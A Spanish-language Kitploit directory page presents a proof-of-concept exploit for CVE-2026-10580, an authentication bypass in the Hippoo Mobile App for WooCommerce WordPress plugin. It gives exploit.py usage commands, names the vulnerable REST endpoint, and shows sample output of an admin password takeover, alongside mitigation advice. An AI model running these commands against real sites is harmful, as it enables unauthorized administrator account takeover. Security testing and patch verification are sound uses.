Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-10580 — Exploit PoC para CVE-2026-10580 - Bypass de autenticación en la aplicación móvil Hippoo para WooCommerce <= 1.9.4 que conduce a la toma de control de la cuenta de administrador | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
Autenticación y AutorizaciónAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

Exploit PoC para CVE-2026-10580 - Bypass de autenticación en la aplicación móvil Hippoo para WooCommerce <= 1.9.4 que conduce a la toma de control de la cuenta de administrador

Ver Repositorio
4hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

WordPress

WordPress - Hippoo Mobile App for WooCommerce <= 1.9.4 - Bypass de Autenticación para Toma de Control de Cuenta de Administrador

License: MIT

Resumen

Esta herramienta es un exploit de prueba de concepto para CVE-2026-10580, una vulnerabilidad de bypass de autenticación que afecta al plugin de WordPress Hippoo Mobile App for WooCommerce (versiones <= 1.9.4). La vulnerabilidad permite a atacantes no autenticados restablecer la contraseña de cualquier usuario, incluidos los administradores, lo que lleva a una toma de control completa del sitio.

⚠️ Importante: Esta herramienta es únicamente para pruebas de seguridad autorizadas y fines educativos. El uso no autorizado contra sistemas que no poseas o para los que no tengas permiso explícito para probar es ilegal.

Características

  • Enumera todos los usuarios de WordPress a través del endpoint vulnerable de la API REST
  • Restablece la contraseña para un ID de usuario especificado (por defecto: ID de administrador 1)
  • Interfaz de línea de comandos simple con salida coloreada
  • Opción para deshabilitar la verificación SSL en entornos de prueba

Uso

Prerrequisitos

  • Python 3.6+
  • Librería requests

Instala las dependencias:

root@kitploit:~
pip install requests

Comando Básico

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

Opciones

Ejemplos

Explotación con ID de administrador predeterminado (1) y verificación SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

Apuntar a un ID de usuario específico y deshabilitar verificación SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

Ejecutar sin el banner:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

Salida de Ejemplo

root@kitploit:~
[+] Found 3 user(s)
    - User ID: 1 | Username: admin | Role: administrator
    - User ID: 2 | Username: editor_user | Role: editor
    - User ID: 3 | Username: subscriber1 | Role: subscriber

╔══════════════════════════════════════════════════════════════╗
║             ADMIN TAKEOVER SUCCESSFUL                        ║
╚══════════════════════════════════════════════════════════════╝
    Target: https://example.com
    Login: https://example.com/wp-admin
    Username: admin
    Password: PwnedCVE2026!!

Mitigación

Si estás utilizando el plugin Hippoo, actualízalo inmediatamente a una versión parcheada (>1.9.4). Además:

  • Audita regularmente las cuentas de usuario en busca de cambios no autorizados
  • Monitorea los registros en busca de solicitudes API inesperadas a /wp-json/wc-hippoo/v1/ext/wp/v2/users
  • Considera restringir el acceso a la API REST de WordPress si no es requerida

Licencia

Este proyecto está licenciado bajo la Licencia MIT. Consulta el archivo LICENSE para más detalles.

Autor

0xgh057r3c0n

Descargo de responsabilidad

El autor no se hace responsable por el mal uso de esta herramienta. Úsala de manera responsable y solo en sistemas que poseas o para los que tengas permiso explícito para probar.

Descargar herramienta
ArgumentoDescripción
-t, --targetURL del sitio WordPress objetivo (ej., https://example.com)
-p, --passwordNueva contraseña a establecer para la cuenta de administrador
-i, --idID de usuario para tomar el control (por defecto: 1)
-k, --insecureOmitir verificación de certificado SSL
--no-bannerSuprimir el banner ASCII